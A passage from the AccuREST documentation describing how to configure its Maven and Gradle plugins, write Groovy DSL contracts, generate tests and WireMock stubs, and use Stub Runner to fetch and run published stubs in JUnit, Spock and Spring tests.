project\n\n## Add maven plugin\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <executions>\n <execution>\n <goals>\n <goal>convert<\/goal>\n <goal>generateStubs<\/goal>\n <goal>generateTests<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n<\/plugin>\n----\n\nRead more: [accurest-maven-plugin](https:\/\/github.com\/Codearte\/accurest-maven-plugin)\n\n## Add stubs\n\nBy default Accurest is looking for stubs in `src\/test\/accurest` directory.\nDirectory containing stub definitions is treated as a class name, and each stub definition is treated as a single test.\nWe assume that it contains at least one directory which will be used as test class name. If there is more than one level of nested directories all except the last one will be used as package name.\nSo with following structure\n\n[source,groovy,indent=0]\n----\nsrc\/test\/accurest\/myservice\/shouldCreateUser.groovy\nsrc\/test\/accurest\/myservice\/shouldReturnUser.groovy\n----\n\nAccurest will create test class `defaultBasePackage.MyService` with two methods\n - `shouldCreateUser()`\n - `shouldReturnUser()`\n\n## Run plugin\n\nPlugin goal `generateTests` is assigned to be invoked in phase `generate-test-sources`. You have nothing to do as long as you want it to be part of your build process. If you just want to generate tests please invoke `generateTests` goal.\n\n## Configure plugin\n\nTo change default configuration just add `configuration` section to plugin definition or `execution` definition.\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <executions>\n <execution>\n <goals>\n <goal>convert<\/goal>\n <goal>generateStubs<\/goal>\n <goal>generateTests<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n <configuration>\n <basePackageForTests>com.ofg.twitter.place<\/basePackageForTests>\n <baseClassForTests>com.ofg.twitter.place.BaseMockMvcSpec<\/baseClassForTests>\n <\/configuration>\n<\/plugin>\n----\n\n### Configuration options\n\n - **testMode** - defines mode for acceptance tests. By default `MockMvc` which is based on Spring's MockMvc. It can also be changed to `JaxRsClient` or to `Explicit` for real HTTP calls.\n - **basePackageForTests** - specifies base package for all generated tests. By default set to `io.codearte.accurest.tests`.\n - **ruleClassForTests** - specifies Rule which should be added to generated test classes.\n - **baseClassForTests** - base class for generated tests. By default `spock.lang.Specification`.\n - **contractsDir** - directory containing contracts written using the GroovyDSL. By default `\/src\/test\/accurest`.\n - **generatedTestSourcesDir** - test source directory where tests generated from Groovy DSL should be placed. By default `target\/generated-test-sources\/accurest`.\n - **mappingsDir** - dir where the generated Wiremock stubs from Groovy DSL should be placed.\n - **testFramework** - the target test framework to be used; currently Spock and JUnit are supported with Spock being the default framework\n\n## Base class for tests\n\n When using Accurest in default MockMvc you need to create a base specification for all generated acceptance tests. In this class you need to point to endpoint which should be verified.\n\n[source,groovy,indent=0]\n----\npackage org.mycompany.tests\n\nimport org.mycompany.ExampleSpringController\nimport com.jayway.restassured.module.mockmvc.RestAssuredMockMvc\nimport spock.lang.Specification\n\nclass MvcSpec extends Specification {\n def setup() {\n RestAssuredMockMvc.standaloneSetup(new ExampleSpringController())\n }\n}\n----\n\nIn case of using `Explicit` mode, you can use base class to initialize the whole tested app similarly as in regular integration tests. In case of `JAXRSCLIENT` mode this base class should also contain `protected WebTarget webTarget` field, right now the only option to test JAX-RS API is to start a web server.\n\n## Invoking generated tests\n\nAccurest Maven Plugins generates verification code into directory `\/generated-test-sources\/accurest` and attach this directory to `testCompile` goal.\n\nFor Groovy Spock code use:\n\n[source,xml,indent=0]\n----\n<plugin>\n\t<groupId>org.codehaus.gmavenplus<\/groupId>\n\t<artifactId>gmavenplus-plugin<\/artifactId>\n\t<version>1.5<\/version>\n\t<executions>\n\t\t<execution>\n\t\t\t<goals>\n\t\t\t\t<goal>testCompile<\/goal>\n\t\t\t<\/goals>\n\t\t<\/execution>\n\t<\/executions>\n\t<configuration>\n\t\t<testSources>\n\t\t\t<testSource>\n\t\t\t\t<directory>${project.basedir}\/src\/test\/groovy<\/directory>\n\t\t\t\t<includes>\n\t\t\t\t\t<include>**\/*.groovy<\/include>\n\t\t\t\t<\/includes>\n\t\t\t<\/testSource>\n\t\t\t<testSource>\n\t\t\t\t<directory>${project.build.directory}\/generated-test-sources\/accurest<\/directory>\n\t\t\t\t<includes>\n\t\t\t\t\t<include>**\/*.groovy<\/include>\n\t\t\t\t<\/includes>\n\t\t\t<\/testSource>\n\t\t<\/testSources>\n\t<\/configuration>\n<\/plugin>\n----\n\nTo ensure that provider side is complaint with defined contracts, you need to invoke `mvn generateTest test`\n\n## Accurest on consumer side\n\nIn consumer service you need to configure Accurest plugin in exactly the same way as in case of provider. You need to copy contracts stored in `src\/test\/accurest` and generate Wiremock json stubs using: `mvn generateStubs` command. By default generated WireMock mapping is stored in directory `target\/mappings`. Your project should create from this generated mappings additional artifact with classifier `stubs` for easy deploy to maven repository.\n\nSample configuration:\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <version>${accurest.version}<\/version>\n <executions>\n <execution>\n <goals>\n <goal>convert<\/goal>\n <goal>generateStubs<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n<\/plugin>\n----\n\nWhen present, json stubs can be used in consumer automated tests.\n\n[source,groovy,indent=0]\n----\n@ContextConfiguration(loader = SpringApplicationContextLoader, classes = Application)\nclass LoanApplicationServiceSpec extends Specification {\n\n @ClassRule\n @Shared\n WireMockClassRule wireMockRule = new WireMockClassRule()\n\n @Autowired\n LoanApplicationService sut\n\n def 'should successfully apply for loan'() {\n given:\n \tLoanApplication application =\n\t\t\tnew LoanApplication(client: new Client(pesel: '12345678901'), amount: 123.123)\n when:\n\tLoanApplicationResult loanApplication = sut.loanApplication(application)\n then:\n\tloanApplication.loanApplicationStatus == LoanApplicationStatus.LOAN_APPLIED\n\tloanApplication.rejectionReason == null\n }\n}\n----\n\nUnderneath LoanApplication makes a call to FraudDetection service. This request is handled by Wiremock server configured using stubs generated by Accurest.\n\n# 3. Contract DSL\n\nContract DSL in AccuREST is written in Groovy, but don't be alarmed if you didn't use Groovy before. Knowledge of the language is not really needed as our DSL uses only a tiny subset of it (namely literals, method calls and closures). What's more, AccuREST's DSL is designed to be programmer-readable without any knowledge of the DSL itself.\n\nLet's look at full example of a contract definition.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'POST'\n urlPath('\/users') {\n queryParameters {\n parameter 'limit': 100\n parameter 'offset': containing(\"1\")\n parameter 'filter': \"email\"\n }\n }\n headers {\n header 'Content-Type': 'application\/json'\n }\n body '''{ \"login\" : \"john\", \"name\": \"John The Contract\" }'''\n }\n response {\n status 200\n headers {\n header 'Location': '\/users\/john'\n }\n }\n}\n----\n\nNot all features of the DSL are used in example above. If you didn't find what you are looking for, please check next paragraphs on this page.\n\n> You can easily compile Accurest Contracts to WireMock stubs mapping using standalone maven command: `mvn io.codearte.accurest:accurest-maven-plugin:convert`.\n\n## Top-Level Elements\n\nFollowing methods can be called in the top-level closure of a contract definition. Request and response are mandatory, priority is optional.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n \/\/ Definition of HTTP request part of the contract\n \/\/ (this can be a valid request or invalid depending\n \/\/ on type of contract being specified).\n request {\n ...\n }\n\n \/\/ Definition of HTTP response part of the contract\n \/\/ (a service implementing this contract should respond\n \/\/ with following response after receiving request\n \/\/ specified in \"request\" part above).\n response {\n ...\n }\n\n \/\/ Contract priority, which can be used for overriding\n \/\/ contracts (1 is highest). Priority is optional.\n priority 1\n}\n----\n\n## Request\n\nHTTP protocol requires only **method and address** to be specified in a request. The same information is mandatory in request definition of AccuREST contract.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n \/\/ HTTP request method (GET\/POST\/PUT\/DELETE).\n method 'GET'\n\n \/\/ Path component of request URL is specified as follows.\n urlPath('\/users')\n }\n\n response {\n ...\n }\n}\n----\n\nIt is possible to specify whole `url` instead of just path, but `urlPath` is the recommended way as it makes the tests **host-independent**.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'GET'\n\n \/\/ Specifying `url` and `urlPath` in one contract is illegal.\n url('http:\/\/localhost:8888\/users')\n }\n\n response {\n ...\n }\n}\n----\n\nRequest may contain **query parameters**, which are specified in a closure nested in a call to `urlPath` or `url`.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n urlPath('\/users') {\n\n \/\/ Each parameter is specified in form\n \/\/ `'paramName' : paramValue` where parameter value\n \/\/ may be a simple literal or one of matcher functions,\n \/\/ all of which are used in this example.\n queryParameters {\n\n \/\/ If a simple literal is used as value\n \/\/ default matcher function is used (equalTo)\n parameter 'limit': 100\n\n \/\/ `equalTo` function simply compares passed value\n \/\/ using identity operator (==).\n parameter 'filter': equalTo(\"email\")\n\n \/\/ `containing` function matches strings\n \/\/ that contains passed substring.\n parameter 'gender': containing(\"[mf]\")\n\n \/\/ `matching` function tests parameter\n \/\/ against passed regular expression.\n parameter 'offset': matching(\"[0-9]+\")\n\n \/\/ `notMatching` functions tests if parameter\n \/\/ does not match passed regular expression.\n parameter 'loginStartsWith': notMatching(\".{0,2}\")\n }\n }\n\n ...\n }\n\n response {\n ...\n }\n}\n----\n\nIt may contain additional **request headers**...\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n \/\/ Each header is added in form `'Header-Name' : 'Header-Value'`.\n headers {\n header 'Content-Type': 'application\/json'\n }\n\n ...\n }\n\n response {\n ...\n }\n}\n----\n\n...and a **request body**.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n \/\/ JSON and XML formats of request body are supported.\n \/\/ Format will be determined from a header or body's content.\n body '''{ \"login\" : \"john\", \"name\": \"John The Contract\" }'''\n }\n\n response {\n ...\n }\n}\n----\n\n**Body's format** can also be specified explicitly by invoking one of format functions.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n \/\/ In this case body will be formatted as XML.\n body equalToXml(\n '''<user><login>john<\/login><name>John The Contract<\/name><\/user>'''\n )\n }\n\n response {\n ...\n }\n}\n----\n\n## Response\n\nMinimal response must contain **HTTP status code**.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n }\n response {\n \/\/ Status code sent by the server\n \/\/ in response to request specified above.\n status 200\n }\n}\n----\n\nBesides status response may contain **headers** and **body**, which are specified the same way as in the request (see previous paragraph).\n\n## Regular expressions\nYou can use regular expressions to write your requests in Contract DSL. It is particularly useful when you want to indicate that a given response should be provided for requests that follow a given pattern. Also, you can use it when you need to use patterns and not exact values both for your test and your server side tests.\n\n Please see the example below:\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl groovyDsl = GroovyDsl.make {\n request {\n method('GET')\n url $(client(~\/\\\/[0-9]{2}\/), server('\/12'))\n }\n response {\n status 200\n body(\n id: value(\n client('123'),\n server(regex('[0-9]+'))\n ),\n surname: $(\n client('Kowalsky'),\n server('Lewandowski')\n ),\n name: 'Jan',\n created: $(client('2014-02-02 12:23:43'), server({ currentDate(it) }))\n correlationId: value(client('5d1f9fef-e0dc-4f3d-a7e4-72d2220dd827'),\n server(regex('[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}')\n )\n )\n headers {\n header 'Content-Type': 'text\/plain'\n }\n }\n}\n----\n\n## Passing optional parameters\n\nIt is possible to provide optional parameters in your contract. It's only possible to have optional parameter for the:\n\n- __STUB__ side of the Request\n- __TEST__ side of the Response\n\nExample:\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n priority 1\n request {\n method 'POST'\n url '\/users\/password'\n headers {\n header 'Content-Type': 'application\/json'\n }\n body(\n email: $(stub(optional(regex(email()))), test('abc@abc.com')),\n callback_url: $(stub(regex(hostname())), test('http:\/\/partners.com'))\n )\n }\n response {\n status 404\n headers {\n header 'Content-Type': 'application\/json'\n }\n body(\n code: value(stub(\"123123\"), test(optional(\"123123\"))),\n message: \"User not found by email = [${value(test(regex(email())), stub('not.existing@user.com'))}]\"\n )\n }\n}\n----\n\nBy wrapping a part of the body with the `optional()` method you are in fact creating a regular expression that should be present 0 or more times.\n\nThat way for the example above the following test would be generated:\n\n[source,groovy,indent=0]\n----\n given:\n def request = given()\n .header('Content-Type', 'application\/json')\n .body('{\"email\":\"abc@abc.com\",\"callback_url\":\"http:\/\/partners.com\"}')\n\n when:\n def response = given().spec(request)\n .post(\"\/users\/password\")\n\n then:\n response.statusCode == 404\n response.header('Content-Type') == 'application\/json'\n and:\n DocumentContext parsedJson = JsonPath.parse(response.body.asString())\n !parsedJson.read('''$[?(@.code =~ \/(123123)?\/)]''', JSONArray).empty\n !parsedJson.read('''$[?(@.message =~ \/User not found by email = \\\\[[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\\\.[a-zA-Z]{2,4}\\\\]\/)]''', JSONArray).empty\n\n----\n\nand the following stub:\n\n[source,javascript,indent=0]\n----\n{\n \"request\" : {\n \"url\" : \"\/users\/password\",\n \"method\" : \"POST\",\n \"bodyPatterns\" : [ {\n \"matchesJsonPath\" : \"$[?(@.callback_url =~ \/((http[s]?|ftp):\\\\\/)\\\\\/?([^:\\\\\/\\\\s]+)(:[0-9]{1,5})?\/)]\"\n }, {\n \"matchesJsonPath\" : \"$[?(@.email =~ \/([a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\\\.[a-zA-Z]{2,4})?\/)]\"\n } ],\n \"headers\" : {\n \"Content-Type\" : {\n \"equalTo\" : \"application\/json\"\n }\n }\n },\n \"response\" : {\n \"status\" : 404,\n \"body\" : \"{\\\"code\\\":\\\"123123\\\",\\\"message\\\":\\\"User not found by email = [not.existing@user.com]\\\"}\",\n \"headers\" : {\n \"Content-Type\" : \"application\/json\"\n }\n },\n \"priority\" : 1\n}\n----\n\n## Executing custom methods on server side\nIt is also possible to define a method call to be executed on the server side during the test. Such a method can be added to the class defined as \"baseClassForTests\" in the configuration. Please see the examples below:\n\n### Groovy DSL\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'PUT'\n url $(client(regex('^\/api\/[0-9]{2}$')), server('\/api\/12'))\n headers {\n header 'Content-Type': 'application\/json'\n }\n body '''\\\n [{\n \"text\": \"Gonna see you at Warsaw\"\n }]\n'''\n }\n response {\n body (\n path: $(client('\/api\/12'), server(regex('^\/api\/[0-9]{2}$'))),\n correlationId: $(client('1223456'), server(execute('isProperCorrelationId($it)')))\n )\n status 200\n }\n}\n----\n\n### Base Mock Spec\n\n[source,groovy,indent=0]\n----\nabstract class BaseMockMvcSpec extends Specification {\n\n def setup() {\n RestAssuredMockMvc.standaloneSetup(new PairIdController())\n }\n\n void isProperCorrelationId(Integer correlationId) {\n assert correlationId == 123456\n }\n}\n----\n\n## JAX-RS support\nStarting with release 0.8.0 we support JAX-RS 2 Client API. Base class needs to define `protected WebTarget webTarget` and server initialization, right now the only option how to test JAX-RS API is to start a web server.\n\nRequest with a body needs to have a content type set otherwise `application\/octet-stream` is going to be used.\n\nIn order to use JAX-RS mode, use the following settings:\n\n[source,groovy,indent=0]\n----\ntestMode = 'JAXRSCLIENT'\n----\n\nExample of a test API generated:\n\n[source,groovy,indent=0]\n----\nclass FraudDetectionServiceSpec extends MvcSpec {\n\n\tdef shouldMarkClientAsNotFraud() {\n\t\twhen:\n\t\t\tdef response = webTarget\n\t\t\t\t\t.path('\/fraudcheck')\n\t\t\t\t\t.request()\n\t\t\t\t\t.method('put', entity('{\"clientPesel\":\"1234567890\",\"loanAmount\":123.123}', 'application\/vnd.fraud.v1+json'))\n\n\t\t\tString responseAsString = response.readEntity(String)\n\n\t\tthen:\n\t\t\tresponse.status == 200\n\t\t\tresponse.getHeaderString('Content-Type') == 'application\/vnd.fraud.v1+json'\n\t\tand:\n\t\t\tdef responseBody = new JsonSlurper().parseText(responseAsString)\n\t\t\tresponseBody.fraudCheckStatus == \"OK\"\n\t\t\tassertThatRejectionReasonIsNull(responseBody.rejectionReason)\n\t}\n\n\tdef shouldMarkClientAsFraud() {\n\t\twhen:\n\t\t\tdef response = webTarget\n\t\t\t\t\t.path('\/fraudcheck')\n\t\t\t\t\t.request()\n\t\t\t\t\t.method('put', entity('{\"clientPesel\":\"1234567890\",\"loanAmount\":99999}', 'application\/vnd.fraud.v1+json'))\n\n\t\t\tString responseAsString = response.readEntity(String)\n\n\t\tthen:\n\t\t\tresponse.status == 200\n\t\t\tresponse.getHeaderString('Content-Type') == 'application\/vnd.fraud.v1+json'\n\t\tand:\n\t\t\tdef responseBody = new JsonSlurper().parseText(responseAsString)\n\t\t\tresponseBody.fraudCheckStatus ==~ java.util.regex.Pattern.compile('[A-Z]{5}')\n\t\t\tresponseBody.rejectionReason == \"Amount too high\"\n\t}\n\n}\n----\n\n# 4. Client Side\n\nDuring the tests you want to have a Wiremock instance up and running that simulates the service Y.\nYou would like to feed that instance with a proper stub definition. That stub definition would need\nto be valid from the Wiremock's perspective but should also be reusable on the server side.\n\n__Summing it up:__ On this side, in the stub definition, you can use patterns for request stubbing and you need exact\nvalues for responses.\n\n# 5. Server Side\n\nBeing a service Y since you are developing your stub, you need to be sure that it's actually resembling your\nconcrete implementation. You can't have a situation where your stub acts in one way and your application on\nproduction behaves in a different way.\n\nThat's why from the provided stub acceptance tests will be generated that will ensure\nthat your application behaves in the same way as you define in your stub.\n\n__Summing it up:__ On this side, in the stub definition, you need exact values as request and can use patterns\/methods\nfor response verification.\n\n# 6. Examples\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'PUT'\n url '\/api\/12'\n headers {\n header 'Content-Type': 'application\/vnd.com.ofg.twitter-places-analyzer.v1+json'\n }\n body '''\\\n [{\n \"created_at\": \"Sat Jul 26 09:38:57 +0000 2014\",\n \"id\": 492967299297845248,\n \"id_str\": \"492967299297845248\",\n \"text\": \"Gonna see you at Warsaw\",\n \"place\":\n {\n \"attributes\":{},\n \"bounding_box\":\n {\n \"coordinates\":\n [[\n [-77.119759,38.791645],\n [-76.909393,38.791645],\n [-76.909393,38.995548],\n [-77.119759,38.995548]\n ]],\n \"type\":\"Polygon\"\n },\n \"country\":\"United States\",\n \"country_code\":\"US\",\n \"full_name\":\"Washington, DC\",\n \"id\":\"01fbe706f872cb32\",\n \"name\":\"Washington\",\n \"place_type\":\"city\",\n \"url\": \"http:\/\/api.twitter.com\/1\/geo\/id\/01fbe706f872cb32.json\"\n }\n }]\n'''\n }\n response {\n status 200\n }\n}\n----\n\n# 7. Scenarios\n\nIt's possible to handle scenarios with Accurest. All you need to do is to stick to proper naming convention while creating your contracts. The convention requires to include order number followed by the underscore.\n\n[source,indent=0]\n----\nmy_contracts_dir\\\n scenario1\\\n 1_login.groovy\n 2_showCart.groovy\n 3_logout.groovy\n----\n\nSuch tree will cause Accurest generating Wiremock's scenario with name `scenario1` and three steps:\n - login marked as `Started` pointing to:\n - showCart marked as `Step1` pointing to:\n - logout marked as `Step2` which will close the scenario.\nMore details about Wiremock scenarios can be found under [http:\/\/wiremock.org\/stateful-behaviour.html](http:\/\/wiremock.org\/stateful-behaviour.html)\n\nAccurest will also generate tests with guaranteed order of execution.\n\n# 8. Stub Runner\n\nOne of the issues that you could have encountered while using AccuREST was to pass the generated WireMock JSON stubs from the server side to the client side (or various clients). Copying the JSON files manually is out of the question.\n\nIn this article you'll see how to prepare your project to start publishing stubs as JARs and how to use Stub Runner in your tests to run WireMock servers and feed them with stub definitions.\n\n## Publishing stubs as JARs\n\nThe easiest approach would be to centralize the way stubs are kept. For example you can keep them as JARs in a Maven repository.\n\n### Gradle\n\nExample of AccuREST Gradle setup:\n\n[source,groovy,indent=0]\n----\n\tapply plugin: 'maven-publish'\n\n\text {\n\t\twiremockStubsOutputDirRoot = file(\"${project.buildDir}\/production\/${project.name}-stubs\/\")\n\t\twiremockStubsOutputDir = new File(wiremockStubsOutputDirRoot)\n\t}\n\n\taccurest {\n\t\ttargetFramework = 'Spock'\n\t\ttestMode = 'MockMvc'\n\t\tbaseClassForTests = 'com.toomuchcoding.MvcSpec'\n\t\tcontractsDslDir = file(\"${project.projectDir.absolutePath}\/mappings\/\")\n\t\tgeneratedTestSourcesDir = file(\"${project.buildDir}\/generated-sources\/\")\n\t\tstubsOutputDir = wiremockStubsOutputDir\n\t}\n\n\ttask stubsJar(type: Jar, dependsOn: [\"generateWireMockClientStubs\"]) {\n\t baseName = \"${project.name}-stubs\"\n\t from wiremockStubsOutputDirRoot\n\t}\n\n\tartifacts {\n\t archives stubsJar\n\t}\n\n\tpublishing {\n\t publications {\n\t stubs(MavenPublication) {\n\t artifactId \"${project.name}-stubs\"\n\t artifact stubsJar\n\t }\n\t }\n\t}\n----\n\n### Maven\n\nExample of Maven can be found in the [AccuREST Maven Plugin README](https:\/\/github.com\/Codearte\/accurest-maven-plugin\/#publishing-wiremock-stubs-projectf-stubsjar)\n\n## Using Stub Runner to automate running stubs\n\nStub Runner automates downloading stubs from a Maven repository (that includes also the local Maven repository) and starting the WireMock server for each of those stubs.\n\n### Modules\n\nAccuREST comes with a new structure of modules\n\n[source,indent=0]\n----\n\u2514\u2500\u2500 stub-runner\n \u251c\u2500\u2500 stub-runner\n \u251c\u2500\u2500 stub-runner-junit\n \u251c\u2500\u2500 stub-runner-spring\n \u2514\u2500\u2500 stub-runner-spring-cloud\n----\n\n#### Stub Runner\n\nContains core logic of Stub Runner. Gives you a main class to run Stub Runner from the command line or from Gradle.\n\nHere you can see a list of options with which you can run Stub Runner:\n\n[source,indent=0]\n----\njava -jar stub-runner.jar [options...]\n -maxp (--maxPort) N : Maximum port value to be assigned to the\n Wiremock instance. Defaults to 15000\n (default: 15000)\n -minp (--minPort) N : Minimal port value to be assigned to the\n Wiremock instance. Defaults to 10000\n (default: 10000)\n -s (--stubs) VAL : Comma separated list of Ivy representation of\n jars with stubs. Eg. groupid:artifactid1,group\n id2:artifactid2:classifier\n -sr (--stubRepositoryRoot) VAL : Location of a Jar containing server where you\n keep your stubs (e.g. http:\/\/nexus.net\/content\n \/repositories\/repository)\n -ss (--stubsSuffix) VAL : Suffix for the jar containing stubs (e.g.\n 'stubs' if the stub jar would have a 'stubs'\n classifier for stubs: foobar-stubs ).\n Defaults to 'stubs' (default: stubs)\n -wo (--workOffline) : Switch to work offline. Defaults to 'false'\n (default: false)\n----\n\nYou can either produce a fat-jar and run the app like presented above.\n\nYou can also configure the stub runner by either passing the full arguments list with the `-Pargs` like this:\n\n`.\/gradlew stub-runner-root:stub-runner:run -Pargs=\"-c pl -minp 10000 -maxp 10005 -s a:b:c,d:e,f:g:h\"`\n\nor each parameter separately with a `-P` prefix and without the hyphen (-) in the name of the param\n\n`.\/gradlew stub-runner-root:stub-runner:run -Pc=pl -Pminp=10000 -Pmaxp=10005 -Ps=a:b:c,d:e,f:g:h`\n\n#### Stub Runner JUnit Rule\n\nStub Runner comes with a JUnit rule thanks to which you can very easily download and run stubs for given group and artifact id:\n\n[source,java,indent=0]\n----\n@ClassRule public static AccurestRule rule = new AccurestRule()\n\t\t\t.repoRoot(\"http:\/\/your.repo.com\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs\", \"loanIssuance\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs:fraudDetectionServer\")\n .downloadStub(\"io.codearte:stub1\", \"io.codearte:stub2:classifier\", \"io.codearte:stub3\");\n----\n\nAfter that rule gets executed Stub Runner connects to your Maven repository and for the given list of dependencies tries to:\n* download them\n* cache them locally\n* unzip them to a temporary folder\n* start a WireMock server for each Maven dependency on a random port from the provided range of ports\n* feed the WireMock server with all JSON files that are valid WireMock definitions\n\nStub Runner uses [Groovy's Grape](http:\/\/docs.groovy-lang.org\/latest\/html\/documentation\/grape.html) mechanism to download the Maven dependencies. Check their [docs](http:\/\/docs.groovy-lang.org\/latest\/html\/documentation\/grape.html) for more information.\n\nSince the `AccurestRule` implements the `StubFinder` it allows you to find the started stubs:\n\n[source,groovy,indent=0]\n----\ninterface StubFinder {\n\t\/**\n\t * For the given groupId and artifactId tries to find the matching\n\t * URL of the running stub.\n\t *\n\t * @param groupId - might be null. In that case a search only via artifactId takes place\n\t * @return URL of a running stub or null if not found\n\t *\/\n\tURL findStubUrl(String groupId, String artifactId)\n\n\t\/**\n\t * For the given Ivy notation {@code groupId:artifactId} tries to find the matching\n\t * URL of the running stub. You can also pass only {@code artifactId}.\n\t *\n\t * @param ivyNotation - Ivy representation of the Maven artifact\n\t * @return URL of a running stub or null if not found\n\t *\/\n\tURL findStubUrl(String ivyNotation)\n\n\t\/**\n\t * Returns all running stubs\n\t *\/\n\tRunningStubs findAllRunningStubs()\n}\n----\n\nExample of usage in Spock tests:\n\n[source,groovy,indent=0]\n----\n@ClassRule @Shared AccurestRule rule = new AccurestRule()\n\t\t\t.repoRoot('http:\/\/your.repo.com')\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs\", \"loanIssuance\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs:fraudDetectionServer\")\n\n\tdef 'should start WireMock servers'() {\n\t\texpect: 'WireMocks are running'\n\t\t\trule.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance') != null\n\t\t\trule.findStubUrl('loanIssuance') != null\n\t\t\trule.findStubUrl('loanIssuance') == rule.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance')\n\t\t\trule.findStubUrl('io.codearte.accurest.stubs:fraudDetectionServer') != null\n\t\tand:\n\t\t\trule.findAllRunningStubs().isPresent('loanIssuance')\n\t\t\trule.findAllRunningStubs().isPresent('io.codearte.accurest.stubs', 'fraudDetectionServer')\n\t\t\trule.findAllRunningStubs().isPresent('io.codearte.accurest.stubs:fraudDetectionServer')\n\t\tand: 'Stubs were registered'\n\t\t\t\"${rule.findStubUrl('loanIssuance').toString()}\/name\".toURL().text == 'loanIssuance'\n\t\t\t\"${rule.findStubUrl('fraudDetectionServer').toString()}\/name\".toURL().text == 'fraudDetectionServer'\n\t}\n----\n\nExample of usage in JUnit tests:\n\n[source,java,indent=0]\n----\n@ClassRule public static AccurestRule rule = new AccurestRule()\n\t\t\t.repoRoot(\"http:\/\/your.repo.com\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs\", \"loanIssuance\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs:fraudDetectionServer\");\n\n\t@Test\n\tpublic void should_start_wiremock_servers() throws Exception {\n\t\t\/\/ expect: 'WireMocks are running'\n\t\t\tthen(rule.findStubUrl(\"io.codearte.accurest.stubs\", \"loanIssuance\")).isNotNull();\n\t\t\tthen(rule.findStubUrl(\"loanIssuance\")).isNotNull();\n\t\t\tthen(rule.findStubUrl(\"loanIssuance\")).isEqualTo(rule.findStubUrl(\"io.codearte.accurest.stubs\", \"loanIssuance\"));\n\t\t\tthen(rule.findStubUrl(\"io.codearte.accurest.stubs:fraudDetectionServer\")).isNotNull();\n\t\t\/\/ and:\n\t\t\tthen(rule.findAllRunningStubs().isPresent(\"loanIssuance\")).isTrue();\n\t\t\tthen(rule.findAllRunningStubs().isPresent(\"io.codearte.accurest.stubs\", \"fraudDetectionServer\")).isTrue();\n\t\t\tthen(rule.findAllRunningStubs().isPresent(\"io.codearte.accurest.stubs:fraudDetectionServer\")).isTrue();\n\t\t\/\/ and: 'Stubs were registered'\n\t\t\tthen(httpGet(rule.findStubUrl(\"loanIssuance\").toString() + \"\/name\")).isEqualTo(\"loanIssuance\");\n\t\t\tthen(httpGet(rule.findStubUrl(\"fraudDetectionServer\").toString() + \"\/name\")).isEqualTo(\"fraudDetectionServer\");\n\t}\n----\n\nCheck the *Common properties for JUnit and Spring* for more information on how to apply global configuration of Stub Runner.\n\n#### Stub Runner Spring\n\nIf you're using Spring then you can just import the `io.codearte.accurest.stubrunner.spring.StubRunnerConfiguration` and a bean of type `StubFinder` will get registered.\n\nIn order to find a URL and port of a given dependency you can autowire the bean in your test and call its methods:\n\n[source,groovy,indent=0]\n----\n@ContextConfiguration(classes = Config, loader = SpringApplicationContextLoader)\nclass StubRunnerConfigurationSpec extends Specification {\n\n\t@Autowired StubFinder stubFinder\n\n\tdef 'should start WireMock servers'() {\n\t\texpect: 'WireMocks are running'\n\t\t\tstubFinder.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance') != null\n\t\t\tstubFinder.findStubUrl('loanIssuance') != null\n\t\t\tstubFinder.findStubUrl('loanIssuance') == stubFinder.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance')\n\t\t\tstubFinder.findStubUrl('io.codearte.accurest.stubs:fraudDetectionServer') != null\n\t\tand:\n\t\t\tstubFinder.findAllRunningStubs().isPresent('loanIssuance')\n\t\t\tstubFinder.findAllRunningStubs().isPresent('io.codearte.accurest.stubs', 'fraudDetectionServer')\n\t\t\tstubFinder.findAllRunningStubs().isPresent('io.codearte.accurest.stubs:fraudDetectionServer')\n\t\tand: 'Stubs were registered'\n\t\t\t\"${stubFinder.findStubUrl('loanIssuance').toString()}\/name\".toURL().text == 'loanIssuance'\n\t\t\t\"${stubFinder.findStubUrl('fraudDetectionServer').toString()}\/name\".toURL().text == 'fraudDetectionServer'\n\t}\n\n\t@Configuration\n\t@Import(StubRunnerConfiguration)\n\t@EnableAutoConfiguration\n\tstatic class Config {}\n}\n----\n\nCheck the *Common properties for JUnit and 